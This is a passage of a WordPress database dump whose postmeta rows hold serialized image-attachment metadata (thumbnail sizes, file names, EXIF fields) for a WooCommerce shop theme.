150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"product-13-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"product-13-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"product-13-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"product-13-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"product-13-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"product-13-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"product-13-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"product-13-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1594,556,'_wp_attached_file','2018/01/h3-img2.png'),(1595,556,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:485;s:6:\"height\";i:224;s:4:\"file\";s:19:\"2018/01/h3-img2.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h3-img2-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h3-img2-300x139.png\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"h3-img2-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"h3-img2-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1596,1028,'_wp_attachment_image_alt','o'),(1597,556,'_wp_attachment_image_alt','a'),(1598,1029,'_wp_attached_file','2018/01/Long-kale-pesto-for-web.jpg'),(1599,1029,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:654;s:4:\"file\";s:35:\"2018/01/Long-kale-pesto-for-web.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"Long-kale-pesto-for-web-1024x349.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:349;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-768x262.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:36:\"Long-kale-pesto-for-web-1536x523.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:523;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:36:\"Long-kale-pesto-for-web-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-550x654.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:36:\"Long-kale-pesto-for-web-1100x654.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:654;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"Long-kale-pesto-for-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552205477\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1600,558,'_wp_attached_file','2018/01/h3-img3.png'),(1601,558,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:205;s:4:\"file\";s:19:\"2018/01/h3-img3.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h3-img3-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h3-img3-300x182.png\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"h3-img3-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"h3-img3-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1602,1812,'_wp_attachment_image_alt','a'),(1603,558,'_wp_attachment_image_alt','a'),(1604,2477,'_wp_attachment_image_alt','a'),(1605,1813,'_wp_attached_file','2018/02/portfolio-img-11.jpg'),(1606,1813,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2018/02/portfolio-img-11.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"portfolio-img-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"portfolio-img-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1607,566,'_wp_attached_file','2018/01/Logo-New-TR-web.jpg'),(1608,566,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1223;s:6:\"height\";i:360;s:4:\"file\";s:27:\"2018/01/Logo-New-TR-web.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Logo-New-TR-web-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1609,566,'_wp_attachment_image_alt','o'),(1610,2478,'_wp_attached_file','2018/01/product-14.jpg'),(1611,2478,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2018/01/product-14.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"product-14-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"product-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"product-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"product-14-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"product-14-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"product-14-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"product-14-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"product-14-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"product-14-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"product-14-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"product-14-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-14-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1612,570,'_wp_attached_file','2018/01/h3-img4.jpg'),(1613,570,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:19:\"2018/01/h3-img4.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h3-img4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"h3-img4-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h3-img4-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"h3-img4-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"h3-img4-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:19:\"h3-img4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:19:\"h3-img4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:20:\"h3-img4-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:19:\"h3-img4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:20:\"h3-img4-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h3-img4-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"h3-img4-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:19:\"h3-img4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"h3-img4-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h3-img4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1614,1029,'_wp_attachment_image_alt','o'),(1615,4265,'_wp_attachment_image_alt','a'),(1616,1043,'_wp_attached_file','2018/01/h1-slider1-graphic1.png'),(1617,1043,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:65;s:6:\"height\";i:52;s:4:\"file\";s:31:\"2018/01/h1-slider1-graphic1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1618,1043,'_wp_attachment_image_alt','o'),(1619,1044,'_wp_attached_file','2018/01/blog-img-17.png'),(1620,1044,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:323;s:6:\"height\";i:171;s:4:\"file\";s:23:\"2018/01/blog-img-17.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"blog-img-17-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-17-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"blog-img-17-300x159.png\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-17-150x150.png\";s:5:\"w